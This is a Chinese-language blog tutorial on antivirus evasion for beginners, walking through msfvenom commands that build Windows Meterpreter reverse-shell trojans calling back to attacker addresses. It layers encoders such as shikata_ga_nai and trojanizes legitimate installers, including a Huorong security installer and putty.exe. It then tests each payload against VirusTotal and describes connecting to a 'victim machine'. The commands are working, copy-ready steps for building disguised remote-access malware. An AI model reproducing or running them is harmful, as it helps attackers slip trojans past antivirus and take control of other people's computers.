免杀入门-基础篇 小白都可以看懂（全网最详细）

大家好，我是Dest1ny，今天我准备开一个新的专题--免杀。

大家不要紧张，说免杀感觉好难啥的，我会跟大家一起去学习！

基础环境：

windows用户：1.kali，2.本机或者windows虚拟机。

mac用户：1.kali（我自己是直接在本机终端下载的渗透工具），windows虚拟机（我用的是另一台windows电脑）。因为我们要用到msf，所以大家先检查一下有没有msf。

软件：最好都要有火绒和360，方便测试。

OK，那我们就开始吧！

CLASS-1 免杀是什么？

“免杀”是指在计算机安全领域中，特别是在恶意软件（如病毒、木马等）或攻击中，技术手段能够绕过或规避杀毒软件的检测。这通常是通过使用各种技巧来掩盖恶意代码的真实性质，从而避免被安全软件发现和拦截。

常见的免杀技术包括：

1. **代码混淆**：通过对代码进行复杂化处理，使其不容易被静态分析工具检测。比如，改变变量名、插入无用代码等。

2. **加密和解密**：将恶意代码进行加密，在执行时解密，以避免静态检测。

3. **反沙箱和反调试**：检测恶意软件是否在受控环境中运行，若是则改变行为或停止执行。

4. **利用漏洞**：通过利用系统或应用程序的漏洞，避免被杀毒软件捕捉。

5. **动态生成代码**：在运行时动态生成恶意代码，增加静态检测的难度。

免杀难度确实会大一点，但是会一点和不会两者区别也是很大的，所以我专题的目标是让我们至少当个免杀小子hhhhh。

接下来我们直接开始实战！

CLASS-2 来吧，第一个木马！

首先这个msf会在kali里，是自带的，我这边是在自己mac本上下载好的。

首先我们先创建一个木马：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=3333 -f exe -o payload1.exe

啥意思呢？

• msfvenom: Metasploit Framework 的一个工具，用于生成各种恶意有效负载。

• -p windows/meterpreter/reverse_tcp: 指定了生成的有效负载类型。windows/meterpreter/reverse_tcp 是一个反向连接的 Meterpreter shell，有助于攻击者从目标主机接收控制权限。

• LHOST=192.168.3.175: 设置反向连接的主机地址（攻击者的机器地址）。这是目标主机将在其连接到该地址的端口上进行反向连接。

• LPORT=3333: 设置反向连接的端口号。目标主机会尝试连接到攻击者机器上的 3333 端口。

• -f exe: 指定了生成的文件格式，这里是 Windows 可执行文件（.exe）。

• -o payload1.exe: 设置输出文件的名称为 payload1.exe。这是生成的有效负载的文件名。

其实本质上就是我们可以去拥有了一个木马，通过端口连接可以得到控制权！

我们先看看把木马放沙盒里，看看市面上多少款杀毒软件可以查杀到它hh。

这是网址：

VirusTotalVirusTotalhttps://www.virustotal.com/

完蛋，彻底废了，怎么这么多可以查到？因为没做免杀啊hhhh。

我们先上线木马吧！

先让受害机器下载我的木马，记得关杀软hhhh！我因为两台机器都在同一个局域网，我用的是python下载！

然后让受害机器访问就好了！再去用msf去连接一下木马看一下效果！

OK，连上了，但是这还没有进行加固！

CLASS-3 免杀-1

上第二个木马，我把它叫做易容马！

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15  -f exe -o payload2.exe

• msfvenom: 用于生成恶意有效负载的工具，属于 Metasploit 框架。

• -p windows/meterpreter/reverse_tcp: 指定有效负载为 windows/meterpreter/reverse_tcp，表示这是一个反向 TCP shell，有助于攻击者从目标机器接收 Meterpreter 会话。

• LHOST=10.211.55.2: 设置攻击者机器的 IP 地址，即目标机器反向连接到的地址。

• LPORT=3333: 指定目标主机反向连接到攻击者机器的端口 3333。

• -e x86/shikata_ga_nai: 使用 x86/shikata_ga_nai 编码器对有效负载进行编码。shikata_ga_nai 是一个多态编码器，旨在规避防御系统（如防病毒软件）的检测。

• -b "\x00": 设置排除字节，\x00 是表示 NULL 字节的十六进制形式。NULL 字节通常会终止字符串，在某些情况下会导致有效负载执行失败，因此这里排除了它。

• -i 15: 指定编码器应重复编码 15 次。这增加了有效负载的复杂性，进一步尝试规避检测系统。

• -f exe: 指定生成的文件格式为 Windows 可执行文件（.exe）。

• -o payload2.exe: 将生成的有效负载保存为 payload2.exe。

这里多了一个编码的步骤，通过编码可以去最简单的改变木马的样貌，不那么容易被发现！

我们试试通过编码编写完的木马是否可以躲过免杀！

怎么还比之前多了一个，多次编码好像没用了！！因为这个太老掉牙的编码已经被玩透了hh！不行，现在易容没有用了，人家检查的是灵魂～

再去试试别的。

CLASS-4 免杀-2

我把这个称之为替死鬼上身！

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.3.175 LPORT=3333  -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe  -f exe -o payload3.exe

这个其实大家发现我就多加了一个选项，就是一个exe文件。大家觉得眼熟吗，我把木马捆到了厚绒的exe上了！！

再去检查一下

嘿嘿，有极大的进步了！！这个替死鬼真好用，至少比上面两个跟裸奔一样的木马好多了嘿嘿！

CLASS-5 免杀-3

接下来嘿嘿，我来一个究极炼丹炉，把易容马和替死鬼合在一起去生成木马！颤抖吧！

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.175 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe  -f exe -o payload4.exe

 究极缝合怪，去试试效果是不是会更好！

是有效果的，从4字头变成了3字头！！但是感觉效果还不是那么明显。。。

其实我感觉你编码次数再搞多一点也可以过杀软，比如我编码循环35次：

哈哈哈哈哈，就使劲叠buff吧！

class-6 免杀-4

有些同学就开始想了，那我一直编码不就好了。OK，我们可以去试试！

msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.3.175 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x sysdiag-all-x86-6.0.2.1-2024.09.15.1.exe -f exe -o payload5.exe

如果出现报错，你根据报错信息去加参数即可，每个人情况不一样！

这里是分成了三个部分

第一部分：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw

• -p windows/meterpreter/reverse_tcp: 指定有效负载类型为 Windows 反向 TCP Meterpreter shell。

• -e x86/shikata_ga_nai: 使用 x86/shikata_ga_nai 编码器对有效负载进行编码。shikata_ga_nai 是一种多态编码器，用于绕过安全检测。

• -i 20: 重复编码 20 次。这将使有效负载经过多次编码，增加规避安全软件的复杂性。

• LHOST=10.211.55.2 和 LPORT=3333: 指定反向连接时的攻击者 IP 地址和端口。

• -f raw: 生成原始格式（raw）的有效负载，而不是封装成可执行文件或其他格式。

第二部分： ｜msfvenom -e x86/alpha_upper -i 10 -f raw

• |: 管道符，表示将前一步生成的原始有效负载作为输入，传递到下一个 msfvenom 命令中。

• -e x86/alpha_upper: 使用 x86/alpha_upper 编码器对上一步的有效负载进行再次编码。alpha_upper 编码器将有效负载编码成只包含大写字母的形式，以便通过特定的安全过滤器。

• -i 10: 重复编码 10 次，以增加规避检测的难度。

• -f raw: 再次以原始格式输出有效负载。

第三部分：| msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

• |: 将前一步生成的原始格式有效负载传递到本步骤。

• -e x86/countdown: 使用 x86/countdown 编码器对有效负载进行编码。这是一种特殊编码器，将有效负载编码为倒数（countdown）格式。

• -i 10: 再次编码 10 次，进一步增加复杂性。

• -x putty.exe: 将经过多重编码的有效负载注入到一个现有的可执行文件 putty.exe 中。这意味着 putty.exe 文件将包含恶意代码，但其表面行为仍然像一个普通的 Putty 程序。

• -f exe: 将最终结果保存为 Windows 可执行文件格式（.exe）。

• -o payload5.exe: 将生成的有效负载输出到文件 payload5.exe 中

按照道理来说，我编码的比上次多不知道多少了，看一下效果：

意外，并没有很大的效果，说明编码次数越多可能也没有什么用处。也正常，免杀要这么简单也好了哈哈哈哈

免杀就先讲到这，看大家喜不喜欢这个专题，大家多多点赞！

我是Dest1ny,制作不易，多读点赞！